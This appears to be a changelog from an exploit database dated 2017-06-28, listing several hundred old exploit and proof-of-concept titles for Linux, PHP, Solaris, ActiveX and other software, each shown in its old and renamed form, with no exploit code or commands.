DB: 2017-06-28
4 new exploits OpenSSL ASN.1 < 0.9.6j / 0.9.7b - Brute Forcer for Parsing Bugs OpenSSL ASN.1 < 0.9.6j/0.9.7b - Brute Forcer for Parsing Bugs Solaris 2.7 / 2.8 Catman - Local Insecure tmp Symlink Exploit Solaris 2.7/2.8 Catman - Local Insecure tmp Symlink Exploit RedHat 6.1 / 6.2 - TTY Flood Users Exploit RedHat 6.1/6.2 - TTY Flood Users Exploit Linux Kernel 2.4.x / 2.6.x - Assembler Inline Function Local Denial of Service Linux Kernel 2.4.x/2.6.x - Assembler Inline Function Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - 'scm_send Local' Denial of Service Linux Kernel 2.6.9 / 2.4.22-28 - 'igmp.c' Local Denial of Service Linux Kernel 2.4.28/2.6.9 - 'scm_send Local' Denial of Service Linux Kernel 2.4.22-28/2.6.9 - 'igmp.c' Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - vc_resize int Local Overflow Linux Kernel 2.4.28 / 2.6.9 - Memory Leak Local Denial of Service Linux Kernel 2.4.28 / 2.6.9 - 'ip_options_get' Local Overflow Linux Kernel 2.4.28/2.6.9 - vc_resize int Local Overflow Linux Kernel 2.4.28/2.6.9 - Memory Leak Local Denial of Service Linux Kernel 2.4.28/2.6.9 - 'ip_options_get' Local Overflow Apple Mac OSX 10.3.7 - Input Validation Flaw parse_machfile() Denial of Service Apple Mac OSX 10.3.7 - Input Validation Flaw 'parse_machfile()' Denial of Service Xaraya 1.0.0 RC4 - create() Denial of Service Xaraya 1.0.0 RC4 - 'create()' Denial of Service BitchX 1.1-final - do_hook() Remote Denial of Service BitchX 1.1-final - 'do_hook()' Remote Denial of Service Quake 3 Engine Client - CG_ServerCommand() Remote Overflow Quake 3 Engine Client - 'CG_ServerCommand()' Remote Overflow Apache (mod_rewrite) < 1.3.37 / 2.0.59 / 2.2.3 - Remote Overflow (PoC) Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC) FreeBSD 5.4 / 6.0 - (ptrace PT_LWPINFO) Local Denial of Service FreeBSD 5.4/6.0 - (ptrace PT_LWPINFO) Local Denial of Service Asterisk 1.0.12 / 1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC) Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote 
Heap Overflow (PoC) PHP 4.4.4/5.1.6 - htmlentities() Local Buffer Overflow (PoC) PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC) Microsoft Windows - NetrWkstaUserEnum() Remote Denial of Service Microsoft Windows - 'NetrWkstaUserEnum()' Remote Denial of Service Apple Mac OSX 10.4.8 - AppleTalk ATPsndrsp() Heap Buffer Overflow (PoC) Apple Mac OSX 10.4.8 - AppleTalk 'ATPsndrsp()' Heap Buffer Overflow (PoC) Apple Mac OSX 10.4.x Kernel - shared_region_map_file_np() Memory Corruption Apple Mac OSX 10.4.x Kernel - 'shared_region_map_file_np()' Memory Corruption PHP 4.4.4 - Unserialize() ZVAL Reference Counter Overflow (PoC) Netrek 2.12.0 - pmessage2() Remote Limited Format String PHP 5 - wddx_deserialize() String Append Crash Asterisk 1.2.15 / 1.4.0 - Unauthenticated Remote Denial of Service PHP 4.4.4 - 'Unserialize()' ZVAL Reference Counter Overflow (PoC) Netrek 2.12.0 - 'pmessage2()' Remote Limited Format String PHP 5 - 'wddx_deserialize()' String Append Crash Asterisk 1.2.15/1.4.0 - Unauthenticated Remote Denial of Service Asterisk 1.2.16 / 1.4.1 - SIP INVITE Remote Denial of Service PHP 4.4.5 / 4.4.6 - session_decode() Double-Free (PoC) Asterisk 1.2.16/1.4.1 - SIP INVITE Remote Denial of Service PHP 4.4.5/4.4.6 - 'session_decode()' Double-Free (PoC) Opera 9.10 - alert() Remote Denial of Service Opera 9.10 - 'alert()' Remote Denial of Service PHP 5.2.3 - bz2 com_print_typeinfo() Denial of Service PHP 5.2.3 - glob() Denial of Service Asterisk < 1.2.22 / 1.4.8 / 2.2.1 - chan_skinny Remote Denial of Service PHP 5.2.3 - 'bz2 com_print_typeinfo()' Denial of Service PHP 5.2.3 - 'glob()' Denial of Service Asterisk < 1.2.22/1.4.8/2.2.1 - 'chan_skinny' Remote Denial of Service Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Asterisk < 1.2.22/1.4.8 - IAX2 Channel Driver Remote Crash HP ActiveX - 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC) HP - ActiveX 'hpqutil.dll' ListFiles Remote Heap Overflow (PoC) EDraw Office Viewer Component 5.3 - 
FtpDownloadFile() Remote Buffer Overflow EDraw Office Viewer Component 5.3 - 'FtpDownloadFile()' Remote Buffer Overflow eXtremail 2.1.1 - memmove() Remote Denial of Service eXtremail 2.1.1 - 'memmove()' Remote Denial of Service Adobe Shockwave - ShockwaveVersion() Stack Overflow (PoC) Adobe Shockwave - 'ShockwaveVersion()' Stack Overflow (PoC) Apple Mac OSX 10.4.x Kernel - i386_set_ldt() Integer Overflow (PoC) Apple Mac OSX 10.4.x Kernel - 'i386_set_ldt()' Integer Overflow (PoC) OpenSSL < 0.9.7l / 0.9.8d - SSLv2 Client Crash SkyFex Client 1.0 - ActiveX Start() Method Remote Stack Overflow DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC) OpenSSL < 0.9.7l/0.9.8d - SSLv2 Client Crash SkyFex Client 1.0 - ActiveX 'Start()' Method Remote Stack Overflow DivX Player 6.6.0 - ActiveX 'SetPassword()' Denial of Service (PoC) KingSoft - 'UpdateOcx2.dll' SetUninstallName() Heap Overflow (PoC) KingSoft - 'UpdateOcx2.dll' 'SetUninstallName()' Heap Overflow (PoC) Adobe Acrobat Reader 8.1.2 - Malformed PDF Remote Denial of Service (PoC) Adobe Acrobat Reader 8.1.2 - Malformed '.PDF' Remote Denial of Service (PoC) Postfix < 2.4.9 / 2.5.5 / 2.6-20080902 - '.forward' Local Denial of Service Postfix < 2.4.9/2.5.5/2.6-20080902 - '.forward' Local Denial of Service fhttpd 0.4.2 un64() - Remote Denial of Service fhttpd 0.4.2 - 'un64()' Remote Denial of Service VBA32 Personal AntiVirus 3.12.8.x - (malformed archive) Denial of Service VBA32 Personal AntiVirus 3.12.8.x - Malformed Archive Denial of Service AyeView 2.20 - Malformed .GIF Image Local Crash AyeView 2.20 - Malformed '.GIF' Image Local Crash Solaris 9 PortBind - XDR-DECODE taddr2uaddr() Remote Denial of Service Solaris 9 PortBind - XDR-DECODE 'taddr2uaddr()' Remote Denial of Service Linux Kernel < 2.4.36.9 / 2.6.27.5 - Unix Sockets Local Kernel Panic Exploit Linux Kernel < 2.4.36.9/2.6.27.5 - Unix Sockets Local Kernel Panic Exploit DesignWorks Professional 4.3.1 - Local '.CCT' File Stack Buffer Overflow (PoC) 
DesignWorks Professional 4.3.1 - '.CCT' File Local Stack Buffer Overflow (PoC) Vinagre < 2.24.2 - show_error() Remote Format String (PoC) Vinagre < 2.24.2 - 'show_error()' Remote Format String (PoC) Linux Kernel 2.6.27.7-generic / 2.6.18 / 2.6.24-1 - Local Denial of Service Linux Kernel 2.6.27.7-generic/2.6.18/2.6.24-1 - Local Denial of Service MW6 Barcode ActiveX - 'Barcode.dll' Remote Heap Overflow (PoC) MW6 Barcode - ActiveX 'Barcode.dll' Remote Heap Overflow (PoC) Multiple Vendors libc:fts_*() - Local Denial of Service Multiple Vendors - 'libc:fts_*()' Local Denial of Service Icewarp Merak Mail Server 9.4.1 - Base64FileEncode() Buffer Overflow (PoC) Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC) OpenSSL 0.9.8k / 1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service OpenSSL 0.9.8k/1.0.0-beta2 - DTLS Remote Memory Exhaustion Denial of Service Soulseek 157 NS x / 156.x - Remote Distributed Search Code Execution Soulseek 157 NS x/156.x - Remote Distributed Search Code Execution Notepad++ 5.4.5 - Local .C/CPP Stack Buffer Overflow (PoC) Notepad++ 5.4.5 - '.C' / '.CPP' Local Stack Buffer Overflow (PoC) Drupal 6.16 / 5.21 - Denial of Service Drupal 5.21/6.16 - Denial of Service SopCast SopCore Control ActiveX - Remote Execution (PoC) UUSee ReliPlayer ActiveX - Remote Execution (PoC) SopCast SopCore Control - ActiveX Remote Execution (PoC) UUSee ReliPlayer - ActiveX Remote Execution (PoC) Aqua Real 1.0 / 2.0 - Local Crash (PoC) Aqua Real 1.0/2.0 - Local Crash (PoC) iPhone - WebCore::CSSSelector() Remote Crash iPhone - 'WebCore::CSSSelector()' Remote Crash avtech software 'avc781viewer.dll' ActiveX - Multiple Vulnerabilities Avtech Software - ActiveX 'avc781viewer.dll' Multiple Vulnerabilities Apple Safari 4.0.3 / 4.0.4 - Stack Exhaustion Apple Safari 4.0.3/4.0.4 - Stack Exhaustion Multiple browsers - history.go() Denial of Service Multiple browsers - window.print() Denial of Service Multiple browsers - 'history.go()' Denial of 
Service Multiple browsers - 'window.print()' Denial of Service FreeBSD Kernel - mountnfs() Exploit FreeBSD Kernel - 'mountnfs()' Exploit Microsoft Internet Explorer 6 / 7 - Remote Denial of Service Microsoft Internet Explorer 6/7 - Remote Denial of Service PHP 5.3.3 - ibase_gen_id() Off-by-One Overflow PHP 5.3.3 - 'ibase_gen_id()' Off-by-One Overflow Microsoft DRM Technology 'msnetobj.dll' ActiveX - Multiple Vulnerabilities RarCrack 0.2 - 'Filename' init() .bss (PoC) Microsoft DRM Technology - 'msnetobj.dll' ActiveX Multiple Vulnerabilities RarCrack 0.2 - 'Filename' 'init()' '.bss' (PoC) Mozilla Firefox 3.5.10 / 3.6.6 - WMP Memory Corruption Using Popups Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups Microsoft Windows Mobile 6.1 / 6.5 - Double-Free Denial of Service Microsoft Windows Mobile 6.1/6.5 - Double-Free Denial of Service LeadTools 11.5.0.9 (ltdlg11n.ocx) - GetColorRes() Access Violation Denial of Service LeadTools 11.5.0.9 (lttmb11n.ocx) - BrowseDir() Access Violation Denial of Service LeadTools 11.5.0.9 - 'ltdlg11n.ocx' GetColorRes() Access Violation Denial of Service LeadTools 11.5.0.9 - 'lttmb11n.ocx' BrowseDir() Access Violation Denial of Service VideoLAN VLC Media Player 1.1 - Subtitle StripTags() Function Memory Corruption VideoLAN VLC Media Player 1.1 - Subtitle 'StripTags()' Function Memory Corruption PHP 5.3.5 - grapheme_extract() Null Pointer Dereference PHP 5.3.5 - 'grapheme_extract()' Null Pointer Dereference Novell ZenWorks 10 / 11 - TFTPD Remote Code Execution Novell ZenWorks 10/11 - TFTPD Remote Code Execution PHP 5.3.6 - shmop_read() Integer Overflow Denial of Service PHP 5.3.6 - 'shmop_read()' Integer Overflow Denial of Service PHP 5.3.10 - spl_autoload_register() Local Denial of Service PHP 5.3.10 - spl_autoload_call() Local Denial of Service PHP 5.3.10 - 'spl_autoload_register()' Local Denial of Service PHP 5.3.10 - 'spl_autoload_call()' Local Denial of Service PHP 5.3.10 - spl_autoload() Local Denial of Service PHP 
5.3.10 - 'spl_autoload()' Local Denial of Service Apple iOS 5.1.1 - Safari Browser - JS match() & search() Crash (PoC) Apple iOS 5.1.1 Safari Browser - 'JS match()' / 'search()' Crash (PoC) Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.0/2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.0 / 2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.0/2.1 (Digital UNIX 4.0 D / FreeBSD 2.2.4 / HP HP-UX 10.20/11.0 / IBM AIX 3.2.5 / NetBSD 1.2 / Solaris 2.5.1) - Smurf Denial of Service Linux Kernel 2.2 / 2.3 / Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1 - IP Options Linux Kernel 2.0 / 2.1 / 2.2 - autofs Exploit Linux Kernel 2.2/2.3 (Debian Linux 2.1 / RedHat Linux 6.0 / S.u.S.E. Linux 6.1) - IP Options Linux Kernel 2.0/2.1/2.2 - autofs Exploit HP HP-UX 10.20 / IBM AIX 4.1.5 - connect() Denial of Service HP HP-UX 10.20 / IBM AIX 4.1.5 - 'connect()' Denial of Service Linux Kernel 2.0 / 2.0.33 - i_count Overflow (PoC) Linux Kernel 2.0/2.0.33 - i_count Overflow (PoC) FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - setsockopt() Denial of Service FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service Linux Kernel 2.2.12 / 2.2.14 / 2.3.99 (RedHat 6.x) - Socket Denial of Service Linux Kernel 2.2.12/2.2.14/2.3.99 (RedHat 6.x) - Socket Denial of Service PHP 6.0 - openssl_verify() Local Buffer Overflow (PoC) PHP 6.0 - 'openssl_verify()' Local Buffer Overflow (PoC) Linux Kernel 2.1.89 / 2.2.x - Zero-Length Fragment Linux Kernel 2.1.89/2.2.x - Zero-Length Fragment Wireshark 1.8.2 / 1.6.0 - Buffer Overflow (PoC) Wireshark 1.6.0/1.8.2 - Buffer Overflow (PoC) MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2 / 5.2.1 - File Scanner Malicious Archive Denial of Service MAILsweeper - SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service Linux Kernel 2.2 / 2.4 - Deep Symbolic Link Denial of 
Service Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service Linux Kernel 2.4.18 / 2.4.19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion Zlib 1.1.4 - Compression Library gzprintf() Buffer Overrun (1) Zlib 1.1.4 - Compression Library 'gzprintf()' Buffer Overrun (1) PHP 4.3 - socket_iovec_alloc() Integer Overflow PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow PHP 4.x - socket_recv() Signed Integer Memory Corruption PHP 4.x - socket_recvfrom() Signed Integer Memory Corruption PHP 4.x - 'socket_recv()' Signed Integer Memory Corruption PHP 4.x - 'socket_recvfrom()' Signed Integer Memory Corruption Linux Kernel 2.4 / 2.6 - Sigqueue Blocking Denial of Service Linux Kernel 2.4/2.6 - Sigqueue Blocking Denial of Service Colloquy 1.3.5 / 1.3.6 - Denial of Service Colloquy 1.3.5/1.3.6 - Denial of Service FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service FreeBSD 4.10/5.x - 'execve()' Unaligned Memory Access Denial of Service PHP 3/4/5 - Multiple Local / Remote Vulnerabilities (1) PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (1) Linux Kernel 2.4.x / 2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2) PHP 3/4/5 - Local/Remote Multiple Vulnerabilities (2) Linux Kernel 2.6.32-642 / 3.16.0-4 - 'inode' Integer Overflow Linux Kernel 2.6.32-642 /3.16.0-4 - 'inode' Integer Overflow Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x/2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - BlueTooth Signed Buffer Index (PoC) Linux Kernel 2.4.x/2.6.x - BlueTooth Signed Buffer Index (PoC) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux Kernel 
2.2.x/2.3.x/2.4.x/2.5.x/2.6.x - ELF Core Dump Local Buffer Overflow SIEMENS Solid Edge ST4/ST5 SEListCtrlX ActiveX - SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution SIEMENS Solid Edge ST4/ST5 SEListCtrlX - ActiveX SetItemReadOnly Arbitrary Memory Rewrite Remote Code Execution Apache CXF < 2.5.10 / 2.6.7 / 2.7.4 - Denial of Service Apache CXF < 2.5.10/2.6.7/2.7.4 - Denial of Service Firebird 1.5 - Local Inet_Server Buffer Overflow Firebird 1.5 - Inet_Server Local Buffer Overflow Apple Mac OSX 10.x - '.zip' Parsing BOMStackPop() Function Overflow Apple Mac OSX 10.x - '.zip' Parsing 'BOMStackPop()' Function Overflow FreeBSD 5.x I386_Set_LDT() - Multiple Local Denial of Service Vulnerabilities FreeBSD 5.x - 'I386_Set_LDT()' Multiple Local Denial of Service Vulnerabilities FortKnox Personal Firewall 9.0.305.0 / 10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption FortKnox Personal Firewall 9.0.305.0/10.0.305.0 - Kernel Driver 'fortknoxfw.sys' Memory Corruption PulseAudio 0.9.5 - Assert() Remote Denial of Service PulseAudio 0.9.5 - 'Assert()' Remote Denial of Service VBScript 5.8.7600.16385 / 5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read VBScript 5.8.7600.16385/5.8.9600.16384 - RegExpComp::PnodeParse Out-of-Bounds Read PHP openssl_x509_parse() - Memory Corruption PHP - 'openssl_x509_parse()' Memory Corruption MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Aztec - ActiveX 'Data' Parameter Buffer Overflow MW6 Technologies Datamatrix - ActiveX 'Data' Parameter Buffer Overflow MW6 Technologies MaxiCode - ActiveX 'Data' Parameter Buffer Overflow MySQL 6.0.9 - GeomFromWKB() Function First Argument Geometry Value Handling Denial of Service MySQL 6.0.9 - 'GeomFromWKB()' Function First Argument Geometry Value Handling Denial of Service PHP 5.3.x 'Intl' Extension - 
'NumberFormatter::setSymbol()' Function Denial of Service PHP 5.3.x 'Intl' Extension - 'NumberFormatter::setSymbol()' Function Denial of Service phpMyAdmin 4.0.x / 4.1.x / 4.2.x - Denial of Service phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service UltraPlayer 2.112 Malformed - '.avi' File Denial of Service UltraPlayer 2.112 - Malformed '.avi' File Denial of Service Linux Kernel 3.13 / 3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service Linux Kernel 3.13/3.14 (Ubuntu) - 'splice()' System Call Local Denial of Service Advantech Webaccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities PHP 5.4/5.5/5.6 - SplDoublyLinkedList Unserialize() Use-After-Free PHP GMP unserialize() - Use-After-Free PHP 5.4/5.5/5.6 - SplObjectStorage Unserialize() Use-After-Free Advantech Webaccess 8.0 / 3.4.3 - ActiveX Multiple Vulnerabilities PHP 5.4/5.5/5.6 - SplDoublyLinkedList 'Unserialize()' Use-After-Free PHP GMP - 'unserialize()' Use-After-Free PHP 5.4/5.5/5.6 - SplObjectStorage 'Unserialize()' Use-After-Free PHP 5.4/5.5/5.6 - Unserialize() Use-After-Free Vulnerabilities PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities Python 2.7 strop.replace() Method - Integer Overflow Python 3.3 < 3.5 product_setstate() Function - Out-of-Bounds Read Python 2.7 - 'strop.replace()' Method Integer Overflow Python 3.3 < 3.5 - 'product_setstate()' Function Out-of-Bounds Read Linux Kernel 3.x / 4.x - prima WLAN Driver Heap Overflow Linux Kernel 3.x/4.x - prima WLAN Driver Heap Overflow NTPd ntp-4.2.6p5 - ctl_putdata() Buffer Overflow NTPd ntp-4.2.6p5 - 'ctl_putdata()' Buffer Overflow Linux Kernel 3.10 / 3.18 / 4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10/3.18 /4.4 - Netfilter IPT_SO_SET_REPLACE Memory Corruption ImageMagick 6.9.3-9 / 7.0.1-0 - Multiple Vulnerabilities (ImageTragick) ImageMagick 6.9.3-9/7.0.1-0 - Multiple Vulnerabilities (ImageTragick) Linux ARM/ARM64 - perf_event_open() Arbitrary Memory Read Linux ARM/ARM64 - 'perf_event_open()' Arbitrary 
Memory Read PHP 7.0.8 / 5.6.23 / 5.5.37 - bzread() Out-of-Bounds Write PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - PacketBB Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - WSP Dissector Denial of Service Wireshark 2.0.0 < 2.0.4 / 1.12.0 < 1.12.12 - RLC Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - PacketBB Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - WSP Dissector Denial of Service Wireshark 1.12.0 < 1.12.12 / 2.0.0 < 2.0.4 - RLC Dissector Denial of Service PHP 5.0.0 - hw_docbyanchor() Local Denial of Service PHP 5.0.0 - 'hw_docbyanchor()' Local Denial of Service Linux Kernel 4.8.0-22 / 3.10.0-327 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference Linux Kernel 3.10.0-327/4.8.0-22 (Ubuntu 16.10 / RedHat) - 'keyctl' Null Pointer Dereference IBM DB2 9.7 / 10.1 / 10.5 / 11.1 - Command Line Processor Buffer Overflow Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation IBM DB2 9.7/10.1/10.5/11.1 - Command Line Processor Buffer Overflow Microsoft MsMpEng - mpengine x86 Emulator Heap Corruption in VFS API Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation man-db 2.4.1 - open_cat_stream() Local uid=man Exploit man-db 2.4.1 - 'open_cat_stream()' Local uid=man Exploit Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (1) Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (PoC) (2) Linux Kernel 2.4.23 / 2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Privilege Escalation Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - 'mremap()' Privilege Escalation Linux Kernel 
2.2.25/2.4.24/2.6.2 - 'mremap()' Validator (PoC) Linux Kernel 2.2.25/2.4.24/2.6.2 - 'mremap()' Privilege Escalation xsplumber - strcpy() Buffer Overflow xsplumber - 'strcpy()' Buffer Overflow BSDi 3.0 / 4.0 - rcvtty[mh] Local Exploit BSDi 3.0/4.0 - rcvtty[mh] Local Exploit Solaris 2.5 / 2.5.1 - getgrnam() Local Overflow Solaris 2.5/2.5.1 - 'getgrnam()' Local Overflow Solaris 7 / 8-beta - arp Local Overflow Solaris 7/8-beta - ARP Local Overflow Solaris 2.6 / 2.7 - '/usr/bin/write' Local Overflow Solaris 2.6/2.7 - '/usr/bin/write' Local Overflow LibXt - XtAppInitialize() Overflow *xterm Exploit LibXt - 'XtAppInitialize()' Overflow *xterm Exploit SGI IRIX - '/bin/login Local' Buffer Overflow SGI IRIX - '/bin/login' Local Buffer Overflow LibPNG 1.2.5 - png_jmpbuf() Local Buffer Overflow LibPNG 1.2.5 - 'png_jmpbuf()' Local Buffer Overflow CDRecord's ReadCD - '$RSH' exec() SUID Shell Creation CDRecord's ReadCD - '$RSH' 'exec()' SUID Shell Creation Linux Kernel 2.4.27 / 2.6.8 - 'binfmt_elf' Executable File Read Exploit Linux Kernel 2.4.27/2.6.8 - 'binfmt_elf' Executable File Read Exploit Linux Kernel 2.6.x < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation Linux Kernel < 2.6.7-rc3 (Slackware 9.1 / Debian 3.0) - 'sys_chown()' Group Ownership Alteration Privilege Escalation Setuid perl - PerlIO_Debug() Overflow Setuid perl - 'PerlIO_Debug()' Overflow Linux Kernel 2.4.x / 2.6.x - 'uselib()' Privilege Escalation (3) Linux Kernel 2.4.x/2.6.x - 'uselib()' Privilege Escalation (3) Linux Kernel 2.4.x / 2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2) Linux Kernel 2.4.x/2.6.x - 'Bluez' BlueTooth Signed Buffer Index Privilege Escalation (2) ePSXe 1.6.0 - nogui() Local Exploit ePSXe 1.6.0 - 'nogui()' Local Exploit Solaris 9 / 10 - ld.so Privilege Escalation (1) Solaris 9 / 10 - ld.so Privilege Escalation (2) Solaris 9/10 - 'ld.so' Privilege Escalation (1) Solaris 9/10 - 'ld.so' Privilege Escalation (2) 
Python 2.4.2 - realpath() Local Stack Overflow Python 2.4.2 - 'realpath()' Local Stack Overflow Solaris 10 sysinfo() - Local Kernel Memory Disclosure (1) Solaris 10 - 'sysinfo()' Local Kernel Memory Disclosure (1) Open Cubic Player 2.6.0pre6 / 0.1.10_rc5 - Multiple Buffer Overflow Open Cubic Player 2.6.0pre6/0.1.10_rc5 - Multiple Buffer Overflow PHP 4.4.3 / 5.1.4 - (objIndex) Local Buffer Overflow (PoC) PHP 4.4.3 / 5.1.4 - (sscanf) Local Buffer Overflow PHP 4.4.3/5.1.4 - 'objIndex' Local Buffer Overflow (PoC) PHP 4.4.3/5.1.4 - 'sscanf' Local Buffer Overflow Solaris 8 / 9 - '/usr/ucb/ps' Local Information Leak Exploit Solaris 8/9 - '/usr/ucb/ps' Local Information Leak Exploit OpenBSD 3.x < 4.0 - vga_ioctl() Privilege Escalation OpenBSD 3.x < 4.0 - 'vga_ioctl()' Privilege Escalation PHP < 4.4.5 / 5.2.1 - PHP_binary Session Deserialization Information Leak PHP < 4.4.5 / 5.2.1 - WDDX Session Deserialization Information Leak PHP 4.4.6 - mssql_[p]connect() Local Buffer Overflow PHP 5.2.1 - substr_compare() Information Leak Exploit PHP < 4.4.5 / 5.2.1 - (shmop functions) Local Code Execution PHP < 4.4.5 / 5.2.1 - (shmop) SSL RSA Private-Key Disclosure PHP < 4.4.5/5.2.1 - PHP_binary Session Deserialization Information Leak PHP < 4.4.5/5.2.1 - WDDX Session Deserialization Information Leak PHP 4.4.6 - 'mssql_[p]connect()' Local Buffer Overflow PHP 5.2.1 - 'substr_compare()' Information Leak Exploit PHP < 4.4.5/5.2.1 - 'shmop' Functions Local Code Execution PHP < 4.4.5/5.2.1 - 'shmop' SSL RSA Private-Key Disclosure PHP 4.4.6 - crack_opendict() Local Buffer Overflow (PoC) PHP 4.4.6 - snmpget() object id Local Buffer Overflow (PoC) PHP 4.4.6 - 'crack_opendict()' Local Buffer Overflow (PoC) PHP 4.4.6 - 'snmpget()' Object id Local Buffer Overflow (PoC) PHP 4.4.6 - cpdf_open() Local Source Code Disclosure (PoC) PHP 4.4.6 - 'cpdf_open()' Local Source Code Disclosure (PoC) PHP 5.2.1 - session_regenerate_id() Double-Free Exploit PHP 5.2.1 - 'session_regenerate_id()' Double-Free 
Exploit PHP 4.4.6 - ibase_connect() Local Buffer Overflow PHP 4.4.6 / 5.2.1 - array_user_key_compare() ZVAL dtor Local Exploit PHP 5.2.0 (OSX) - header() Space Trimming Buffer Underflow Exploit PHP 4.4.6 / 5.2.1 - ext/gd Already Freed Resources Usage Exploit PHP 5.2.1 - hash_update_file() Freed Resource Usage Exploit PHP 5.2.1 - Unserialize() Local Information Leak Exploit PHP < 4.4.5 / 5.2.1 - _SESSION unset() Local Exploit PHP < 4.4.5 / 5.2.1 - _SESSION Deserialization Overwrite PHP 4.4.6 - 'ibase_connect()' Local Buffer Overflow PHP 4.4.6/5.2.1 - 'array_user_key_compare()' ZVAL dtor Local Exploit PHP 5.2.0 (OSX) - 'header()' Space Trimming Buffer Underflow Exploit PHP 4.4.6/5.2.1 - ext/gd Already Freed Resources Usage Exploit PHP 5.2.1 - 'hash_update_file()' Freed Resource Usage Exploit PHP 5.2.1 - 'Unserialize()' Local Information Leak Exploit PHP < 4.4.5/5.2.1 - '_SESSION' 'unset()' Local Exploit PHP < 4.4.5/5.2.1 - '_SESSION' Deserialization Overwrite PHP 5.2.3 - snmpget() object id Local Buffer Overflow PHP 5.2.3 - 'snmpget()' Object id Local Buffer Overflow IBM AIX 5.3 SP6 - FTP gets() Privilege Escalation IBM AIX 5.3 SP6 - FTP 'gets()' Privilege Escalation PHP 5.2.3 - snmpget() object id Local Buffer Overflow (EDI) PHP 5.2.3 - 'snmpget()' object id Local Buffer Overflow (EDI) PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 'FFI' Extension 5.0.5 - 'Safe_mode' Local Bypass Exploit PHP 4.4.7 / 5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit PHP 4.4.7/5.2.3 - MySQL/MySQLi 'Safe_Mode' Bypass Exploit Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Escalation Linux Kernel 2.4/2.6 (x86-64) - System Call Emulation Privilege Escalation Numark Cue 5.0 rev 2 - Local '.m3u' File Stack Buffer Overflow Numark Cue 5.0 rev 2 - '.m3u' File Local Stack Buffer Overflow Adobe Reader - util.printf() JavaScript Function Stack Overflow (1) Adobe Reader - util.printf() JavaScript Function Stack Overflow (2) Adobe Reader - 'util.printf()' 
